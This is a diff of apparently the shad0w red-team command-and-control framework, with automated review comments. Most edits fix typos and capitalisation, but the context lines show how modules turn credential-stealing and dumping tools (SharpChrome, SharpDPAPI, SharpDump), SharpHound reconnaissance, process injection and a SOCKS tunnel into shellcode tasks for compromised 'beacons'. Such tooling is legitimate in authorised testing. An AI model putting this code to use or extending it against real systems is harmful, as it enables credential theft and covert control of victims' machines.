shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
seatbelt_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(seatbelt_args) != 0:


@ -44,7 +44,7 @@ set -v MsfStageSize -d 14
parse.add_argument("-v", "--variable", help="Variable name")
parse.add_argument("-d", "--data", help="Data to store in the variable")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:


@ -12,10 +12,10 @@ __author__ = "@_batsec_, @harmj0y"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# location of sharpchrome binary
# location of Sharpchrome binary
SHARPCHROME_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpChrome.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -37,7 +37,7 @@ def main(shad0w, args):
sharpchrome_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharpchrome_args) != 0:


@ -15,7 +15,7 @@ USERCD_EXEC_ID = 0x3000
# location of sharpdpapi binary
SHARPDPAPI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDPAPI.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -32,12 +32,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
sharpdpapi_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharpdpapi_args) != 0:


@ -15,7 +15,7 @@ USERCD_EXEC_ID = 0x3000
# location of sharpdump binary
SHARPDUMP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDump.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -34,7 +34,7 @@ def main(shad0w, args):
sharpdump_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharpdump_args) != 0:


@ -15,7 +15,7 @@ USERCD_EXEC_ID = 0x3000
# location of sharphound binary
SHARPHOUND_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpHound.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -34,7 +34,7 @@ def main(shad0w, args):
sharphound_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharphound_args) != 0:
@ -48,7 +48,7 @@ def main(shad0w, args):
args.runtime = False
args.appdomain = False
#Generate donut base64 shellcode with "AnyCpu" as target, local bin is x86
# Generate Donut base64 shellcode with "AnyCpu" as target, local bin is x86
b64_comp_data = shellcode.generate(SHARPHOUND_BIN, args, sharphound_args)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)


@ -51,7 +51,7 @@ def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd
# change to the modules directory
os.chdir(modules_dir)
# create the defualt cmd line
# create the default cmd line
if quick == True:
cmd_line = f"-l http://{http_listen}"
cmd = f"./{bin_name} {cmd_line} > /tmp/sharpsocks.log"
@ -109,7 +109,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# save the raw args
@ -140,7 +140,7 @@ sharpsocks client -s http://your.redirector:port/ -k key
parse.add_argument("-v", "--verbose", action='store_true', help="Verbose output")
parse.add_argument("--kill", action='store_true', help="Kill the socks tunnel")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
@ -163,7 +163,7 @@ sharpsocks client -s http://your.redirector:port/ -k key
http_listen_addr = f"*:8080"
key = start_sharpsocks_server(http_listen=http_listen_addr)
if key == None:
print("Failed to start server")
print("Failed to start the server.")
return
threading.Thread(target=await_for_socks_start, args=(shad0w,)).start()
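Review bot: In start_sharpsocks_server the command string `cmd = f"./{bin_name} {cmd_line} > /tmp/sharpsocks.log"` redirects output to a fixed file name in world-writable /tmp, which another local user can pre-create or replace with a symlink before the server starts. A log path in a directory owned by the application, or one created with `tempfile.mkstemp()`, avoids that. The string also interpolates `http_listen` unquoted; how `cmd` is executed is outside this hunk, but if it goes through a shell the value should be passed as an argument list or wrapped in `shlex.quote()`. Separately, `if quick == True:` and `if key == None:` read better as `if quick:` and `if key is None:`.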


@ -12,10 +12,10 @@ __author__ = "@_batsec_, @harmj0y"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# location of sharpup binary
# location of SharpUp binary
SHARPUP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpUp.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -29,12 +29,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
sharpup_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharpup_args) != 0:


@ -15,7 +15,7 @@ USERCD_EXEC_ID = 0x3000
# location of sharpwmi binary
SHARPWMI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpWMI.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -32,12 +32,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
sharpwmi_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharpwmi_args) != 0:


@ -50,8 +50,7 @@ shinject -p 8725 -f shellcode.bin
def build_inject_info(args, rcode):
# create the json object to tell the beacon
# where to execute the code.
# create the json object to tell the beacon where to execute the code
info = {"pid": int(args.pid), "dll": rcode}
@ -135,7 +134,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = ShinjectCommand(args)


@ -52,7 +52,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
@ -76,13 +76,13 @@ upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_
parse.add_argument("-f", "--file", required=True, help="Name of the file you want to upload")
parse.add_argument("-d", "--destination", nargs="*", help="Destination where the uploaded file should be stored")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we dont then fail
# we need a file to read so if we don't then fail
if len(args.file) == 0:
print(error_list)
parse.print_help()
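Review bot: When `parse.parse_args(args[1:])` raises, the bare `except: pass` leaves `args` bound to the original argument list, so the next statement `if len(args.file) == 0:` fails with AttributeError instead of reaching the help output. The handler should end the command explicitly, for example by replacing `pass` with `parse.print_help()` followed by `return`. The same `try` / bare `except:` around `parse_args` appears in the `set -v`, sharpsocks and whoami hunks, where the handler body is outside the visible lines and should be checked for the same fall-through. The rest of `main` continues outside this hunk.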


@ -12,10 +12,10 @@ __author__ = "@Flangvik, @_RastaMouse"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# location of watson binary
# location of Watson binary
WATSON_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/Watson.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -29,12 +29,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
watson_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(watson_args) != 0:
@ -48,7 +48,7 @@ def main(shad0w, args):
args.runtime = False
args.appdomain = False
#Generate donut base64 shellcode with "AnyCpu" as target, local bin is x86
# Generate Donut base64 shellcode with "AnyCpu" as target, local bin is x86
b64_comp_data = shellcode.generate(WATSON_BIN, args, watson_args)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)


@ -1,5 +1,5 @@
#
# Get infomation about the current user
# Get information about the current user
#
import json
@ -8,7 +8,7 @@ import argparse
from lib import shellcode
__description__ = "Get infomation about the current user the beacon is running as"
__description__ = "Get information about the current user the beacon is running as"
__author__ = "@_batsec_"
# using work around for stager bug
@ -82,11 +82,11 @@ whoami --groups
parse.error = error
# setup the args
parse.add_argument("-a", "--all", action='store_true', help="Show all avalible infomation")
parse.add_argument("-p", "--privs", action='store_true', help="Show all privilages")
parse.add_argument("-a", "--all", action='store_true', help="Show all available information")
parse.add_argument("-p", "--privs", action='store_true', help="Show all privileges")
parse.add_argument("-g", "--groups", action='store_true', help="Show all groups the user is a member of")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:


@ -1,5 +1,5 @@
"""
Compile the stuffz
Compile the stuff
"""
import os


@ -76,7 +76,7 @@ class Console(object):
except ValueError: pass
while True:
try:
# display a prompt depending on wheather we got an active beacon or not
# display a prompt depending on whether we got an active beacon or not
if self.shad0w.current_beacon is None:
input = await self.prompt_session.prompt_async(ANSI(self.prompt), completer=self.autocomplete, complete_style=CompleteStyle.READLINE_LIKE)
else:
@ -92,7 +92,7 @@ class Console(object):
with patch_stdout():
input = await self.prompt_session.prompt_async(ANSI(self.active_prompt % (username, machine)), completer=self.autocomplete, complete_style=CompleteStyle.READLINE_LIKE, refresh_interval=0.5)
# handle the input we just recived
# handle the input we just received
try:
with patch_stdout():
await self.cmd_handler.do(input)
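Review bot: Both prompt calls assign their result to `input`, which rebinds the builtin of the same name for the rest of this method. Renaming the local, e.g. `user_input = await self.prompt_session.prompt_async(...)` and `await self.cmd_handler.do(user_input)`, removes the shadowing without changing behaviour. The enclosing method of `Console` starts and ends outside these hunks, so any further use of the name there needs the same rename.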


@ -24,7 +24,7 @@ def log_request():
# shad0w.debug.log(request)
# do nothin jus return
# do nothing just return
return None
@app.route("/")
@ -45,7 +45,7 @@ def web_register_beacon():
shad0w.debug.log("HTTP - '/register' was hit, attempting to register")
# just give it the request so it can pull stuff out itsself
# just give it the request so it can pull stuff out itself
return phandle.register_beacon(request)
@app.route("/tasks", methods=["GET", "POST"])
@ -97,10 +97,10 @@ def run_serv(*args):
phandle = Handler(shad0w)
shad0w.debug.log("starting flask http server")
shad0w.debug.log("Starting flask HTTP server")
shad0w.debug.log(f"Starting HTTPS server ({shad0w.addr[0]}:{shad0w.addr[1]})", log=True)
shad0w.debug.log(f"creating ssl context with {shad0w.sslkey} & {shad0w.sslcrt}")
shad0w.debug.log(f"Creating SSL context with {shad0w.sslkey} & {shad0w.sslcrt}")
try:
app.run(host=shad0w.addr[0], port=shad0w.addr[1], ssl_context=(shad0w.sslcrt, shad0w.sslkey))
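Review bot: The new message `"Starting flask HTTP server"` is followed by `"Starting HTTPS server (...)"`, and the `app.run(...)` call passes `ssl_context`, so the first log line describes the TLS listener as plain HTTP. `shad0w.debug.log("Starting Flask HTTPS server")` would keep the two lines consistent and match the capitalisation used for other product names in this commit. The `except` branch of the `try:` around `app.run` is outside the hunk.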


@ -41,7 +41,7 @@ class Handler(object):
if len(basecmd) > 0:
# reimport so dont have to restart whole c2 for every file change
# reimport so don't have to restart whole c2 for every file change
# but only do this in debug mode
cmd_func = globals()[basecmd]
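Review bot: `cmd_func = globals()[basecmd]` resolves whatever text is in `basecmd` against every module-level name, so it can return an imported module, a class or a constant rather than a command, and an unknown name raises KeyError. An explicit registry, e.g. `cmd_func = COMMANDS.get(basecmd)` with a `None` check, limits the lookup to the intended commands; `COMMANDS` here is a placeholder name for such a dict. Where `basecmd` comes from and how the result is called are outside this hunk.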


@ -21,7 +21,7 @@ def get_base_page(shad0w, site, dynamic=False, htmlonly=False, method=None, head
elif not dynamic:
req = requests.get(site)
except requests.exceptions.MissingSchema:
shad0w.debug.error(f"Need a correctly formatted url e.g https://example.com/")
shad0w.debug.error(f"Need a correctly formatted URL (e.g https://example.com).")
exit(-1)
if not htmlonly:
@ -53,7 +53,7 @@ def fix_internal_links(shad0w, html, site):
def mirror_site(shad0w, site, dynamic=False, method=None, headers=None, data=None, cookies=None):
if not dynamic:
shad0w.debug.log(f"Connecting to {site}...")
shad0w.debug.log(f"Connecting to {site}.")
html = get_base_page(shad0w, site, htmlonly=True)
html = fix_internal_links(shad0w, html, site)
shad0w.page_data = html
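Review bot: In get_base_page, `req = requests.get(site)` is issued without a `timeout`, so a server that accepts the connection and never answers blocks the caller indefinitely; `requests.get(site, timeout=10)` (value to be chosen by the project) bounds it. Only `requests.exceptions.MissingSchema` is handled in the visible lines, so connection errors and timeouts would propagate unless handled outside the hunk. The reworded error string keeps an `f` prefix with no placeholders and writes `e.g` without its second period; `"Need a correctly formatted URL (e.g. https://example.com)."` as a plain string would do.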


@ -17,7 +17,7 @@ class Handler(object):
super(Handler, self).__init__()
self.shad0w = shad0w
# for building responces
# for building responses
self.builder = Builder(shad0w)
def task_beacon(self, request):
@ -43,18 +43,18 @@ class Handler(object):
except KeyError: pass
try:
# if the beacon isnt just checking in to give us
# data then build a responce to give the beacon
# if the beacon isn't just checking in to give us
# data then build a response to give the beacon
if ((opcode == 0) and (data == "")):
# get the current task
tasklist = self.shad0w.beacons[beacon_id]["task"]
# build the responce
# build the response
task = self.builder.build(beacon_id=beacon_id, task=tasklist[0], args=tasklist[1])
# clear the task
self.shad0w.beacons[beacon_id]["task"] = None
# inform user
self.shad0w.debug.log(f"Beacon ({beacon_id}) received task", log=True)
self.shad0w.debug.log(f"Beacon ({beacon_id}) received task.", log=True)
return task
# check if the data is for the current beacon
@ -68,7 +68,7 @@ class Handler(object):
return task
except:
# there aint a task, so tell em that
# there isn't a task, so tell the user that
return self.builder.build(beacon_id=beacon_id, task=None)
else:
# ignore
@ -77,7 +77,7 @@ class Handler(object):
def register_beacon(self, request):
# register a new beacon
# get the info from the initial request an store it
# just ignore if the request isnt correct
# just ignore if the request isn't correct
if request.method == "POST":
@ -139,11 +139,11 @@ class Handler(object):
return self.builder.build(beacon_id=beacon_id, id=beacon_id)
else:
self.shad0w.debug.log("invalid register request")
self.shad0w.debug.log("Invalid register request.")
return self.builder.build(blank=True)
else:
self.shad0w.debug.log("invaild http method for register")
self.shad0w.debug.log("Invalid http method for register.")
return self.builder.build(blank=True)
def stage_beacon(self, request):
@ -199,7 +199,7 @@ class Handler(object):
return rcode
else:
self.shad0w.debug.log("invaild http method for stager")
self.shad0w.debug.log("invalid http method for stager")
return self.builder.build(blank=True)
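Review bot: The rewritten comment `# there isn't a task, so tell the user that` no longer matches the line under it, which returns `self.builder.build(beacon_id=beacon_id, task=None)` as the reply from task_beacon; the recipient appears to be the beacon, so `# there isn't a task, so tell the beacon that` is the accurate wording. The bare `except:` above it also treats every failure in the `try` body as "no task", which hides unrelated errors; catching only the exceptions a missing task produces (presumably `KeyError` and `TypeError`) would make that explicit. In the last hunk the stager message was left as `"invalid http method for stager"`, while the register message became `"Invalid http method for register."`.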


@ -65,7 +65,7 @@ def format_powershell(builder, length=True, code=False):
builder.outfile = temp_file_name
rcode = format_raw(builder, length=False, code=True)
# insert into the powershell template
# insert into the PowerShell template
pcode = powershell.generate(rcode)
with open(outfile, "w") as file:


@ -12,7 +12,7 @@ class Builder(object):
def build(self, blank=False, beacon_id=None, **resp):
# build a responce to the beacon
# build a response to the beacon
if blank is True:
return self.IGNORE_CONTENT
@ -22,7 +22,7 @@ class Builder(object):
resp["alive"] = self.shad0w.beacons[beacon_id]["stay_alive"]
# if we got a 'null' task set it to 0x1000
# this will throw a key error when a beacon is registering... hence the try, except.
# this will throw a key error when a beacon is registering. hence the try, except.
try:
if resp["task"] == None:
@ -34,5 +34,5 @@ class Builder(object):
return json.dumps(resp)
except KeyError:
# we got an invaild beacon id
# we got an invalid beacon id
return self.IGNORE_CONTENT
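Review bot: Replacing the ellipsis with a full stop splits the comment in `build` into two fragments, `... is registering. hence the try, except.`; a single sentence such as `# this raises KeyError while a beacon is registering, hence the try/except` reads correctly. The comparison `if resp["task"] == None:` in the same hunk should use `is None`.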


@ -17,12 +17,12 @@ def generate_srdi(file, flags):
def parse_donut_error(data, filename):
if "Error : File not found." in data:
print(f"Unable to find '{filename}'")
print(f"Unable to find '{filename}'.")
else:
print(f"Failed to execute '{filename}'")
print(f"Failed to execute '{filename}'.")
def generate(file, args, params, parse=True):
""" generate shellcode from a pe using donut """
""" generate shellcode from a pe using Donut """
"""
# build args, kinda messy but idk how else to do it
@ -48,9 +48,9 @@ def generate(file, args, params, parse=True):
return base64.b64encode(shellcode_bytes).decode()
"""
# using the python bindings for donut doesn't seem to let them
# using the python bindings for Donut doesn't seem to let them
# build shellcode from a pe with any arguments? Using this as
# a dirty work around untill this is fixed
# a dirty work around until this is fixed
# if we need to parse the args an build it from them then
if parse:
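Review bot: The docstring of `generate` is immediately followed by a second triple-quoted string that holds a disabled implementation ending in `return base64.b64encode(shellcode_bytes).decode()`. It is evaluated as a bare string expression and is easy to mistake for live code or for part of the docstring. Deleting the block and relying on version control history, or converting it to `#` comments under the existing workaround note, makes the active path clear. The docstring itself could read `"""Generate shellcode from a PE using Donut."""` to match the capitalisation this commit introduces.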


@ -66,9 +66,9 @@ def compile_exe(code, debug=False):
def generate(raw_shellcode, debug=False):
enc_shellcode = format_shellcode(raw_shellcode)
formated_code = TEMPLATE % (enc_shellcode, len(raw_shellcode))
formatted_code = TEMPLATE % (enc_shellcode, len(raw_shellcode))
filename = compile_exe(formated_code, debug=debug)
filename = compile_exe(formatted_code, debug=debug)
with open(filename, "rb") as file:
return file.read()


@ -62,9 +62,9 @@ def compile_exe(code, debug=False):
def generate(raw_shellcode, debug=False):
enc_shellcode = format_shellcode(raw_shellcode)
formated_code = TEMPLATE % (enc_shellcode, len(raw_shellcode))
formatted_code = TEMPLATE % (enc_shellcode, len(raw_shellcode))
filename = compile_exe(formated_code, debug=debug)
filename = compile_exe(formatted_code, debug=debug)
with open(filename, "rb") as file:
return file.read()


@ -29,8 +29,7 @@ def get_data_from_json(jdata):
opcode = 0
data = ""
# if we get any errors, just return the above values
# and this req will then be ignored
# if we get any errors, just return the above values and this req will then be ignored
try:
id = jdata['id']
if jdata['opcode']:
@ -46,7 +45,6 @@ def get_data_from_json(jdata):
async def compile_and_store_static(shad0w):
# compile a static secure beacon and store it in memory
shad0w.payloads["x64_secure_static"] = {}
arch = "x64"
@ -93,7 +91,6 @@ async def compile_and_store_static(shad0w):
async def compile_and_store_static_srdi(shad0w):
# compile a static secure beacon and store it in memory
shad0w.payloads["x64_secure_static_srdi"] = {}
arch = "x64"